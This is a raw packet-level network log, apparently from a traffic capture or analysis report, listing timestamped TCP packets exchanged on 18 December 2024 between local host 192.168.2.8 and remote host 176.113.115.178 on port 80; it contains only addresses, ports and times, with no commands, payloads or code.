                                                  Dec 18, 2024 14:07:42.127909899 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.128648043 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.128695965 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.128698111 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.129432917 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.129445076 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.129478931 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.130280018 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.130294085 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.130321026 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.131112099 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.131150007 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.131186008 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.131959915 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.131972075 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.132010937 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.132733107 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.132782936 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.133004904 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.133663893 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.133677006 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.133702993 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.134406090 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.134443045 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.134535074 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.135241985 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.135255098 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.135277987 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.136163950 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.136184931 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.136212111 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.136935949 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.136948109 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.136981964 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.137712955 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.137752056 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.137784958 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.138497114 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.138539076 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.138572931 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.139339924 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.139380932 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.139591932 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.140119076 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.140165091 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.140254021 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.141005039 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.141017914 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.141036034 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.142051935 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.142086029 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.142162085 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.142726898 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.142819881 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.142940044 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.143455982 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.143491983 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.143553019 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.144289017 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.144330025 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.144403934 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.145121098 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.145168066 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.230099916 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.230115891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.230174065 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.230252028 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.230506897 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.230559111 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.231137037 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.231225014 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.231267929 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.232026100 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.232121944 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.232166052 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.232817888 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.232831001 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.232867002 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.233581066 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.233669996 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.233998060 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.234483957 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.234639883 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.234685898 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.235323906 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.235352993 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.235390902 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.236036062 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.236156940 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.236202955 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.236895084 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.236979961 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.237029076 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.237718105 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.237770081 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.237921000 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.238581896 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.238698006 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.238748074 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.239362001 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.239552021 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.239597082 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.240159988 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.240242958 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.240287066 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.305704117 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.305816889 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.305898905 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.306056976 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.306070089 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.306081057 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.306119919 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.306725979 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.306736946 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.306775093 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.307746887 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.307791948 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.307811975 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.308407068 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.308422089 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.308494091 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.309077024 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.309120893 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.309191942 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.309726954 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.309771061 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.309900999 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.310600996 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.310648918 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.310733080 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.311325073 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.311367035 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.311549902 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.312207937 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.312247992 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.312325954 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.313016891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.313061953 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.313231945 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.313817978 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.313860893 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.313950062 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.314652920 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.314697981 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.314815998 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.315552950 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.315596104 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.315757990 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.316505909 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.316548109 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.316618919 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.317114115 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.317159891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.317164898 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.318152905 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.318196058 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.318238974 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.319124937 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.319138050 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.319195032 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.319792032 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.319804907 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.319838047 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.320445061 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.320488930 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.320509911 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.321280003 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.321324110 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.321329117 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.322072983 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.322084904 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.322117090 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.322913885 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.322926998 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.322962046 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.323664904 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.323709011 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.323800087 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.324549913 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.324594021 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.324649096 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.325371027 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.325413942 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.325515985 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.326147079 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.326189995 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.326283932 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.326951981 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.326994896 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.327074051 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.327780962 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.327826977 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.327956915 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.328591108 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.328633070 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.328697920 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.329452038 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.329495907 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.329556942 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.330300093 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.330312014 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.330341101 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.331140041 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.331182957 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.331213951 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.331964970 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.331976891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.332009077 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.332786083 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.332797050 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.332834005 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.333555937 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.333569050 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.333607912 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.334475040 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.334491014 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.334518909 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.335324049 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.335347891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.335396051 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.336057901 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.336071014 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.336107016 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.336956978 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.336967945 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.337022066 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.422118902 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.422180891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.422255039 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.422538996 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.422635078 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.422677994 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.423365116 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.423460007 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.423506975 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.424161911 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.424288988 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.424340010 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.424973965 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.425100088 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.425159931 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.425858974 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.425968885 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.426018000 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.426754951 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.426841974 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.426883936 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.427545071 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.427731037 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.427777052 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.428359985 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.428492069 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.428534031 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.429167032 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.429188013 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.429222107 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.430053949 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.430068016 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.430119038 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.430841923 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.430923939 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.430964947 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.431821108 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.431880951 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.431926966 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.432492018 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.472084045 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.496956110 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.497037888 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.497098923 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.497303963 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.497493982 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.497538090 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.498152971 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.498409986 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.498460054 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.498986959 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.499310017 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.499361038 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.499396086 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.500150919 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.500194073 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.500240088 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.500920057 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.500982046 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.501152039 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.502012968 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.502027035 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.502058029 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.502578974 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.502624035 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.502650023 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.503393888 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.503437042 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.503523111 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.504209995 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.504249096 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.504420042 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.505120993 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.505131960 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.505161047 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.505904913 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.505947113 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.505992889 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.506695986 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.506737947 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.506766081 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.507535934 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.507580042 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.507597923 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.508322001 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.508371115 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.508481026 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.509315014 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.509335995 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.509357929 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.510045052 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.510087967 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.510116100 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.510822058 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.510864973 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.510955095 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.511619091 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.511662960 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.511743069 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.512656927 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.512691975 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.512705088 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.514005899 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.514051914 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.514152050 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.514831066 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.514904022 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.514954090 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.515655041 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.515702963 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.515705109 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.516232014 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.516244888 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.516321898 CET4970780192.168.2.8176.113.115.178
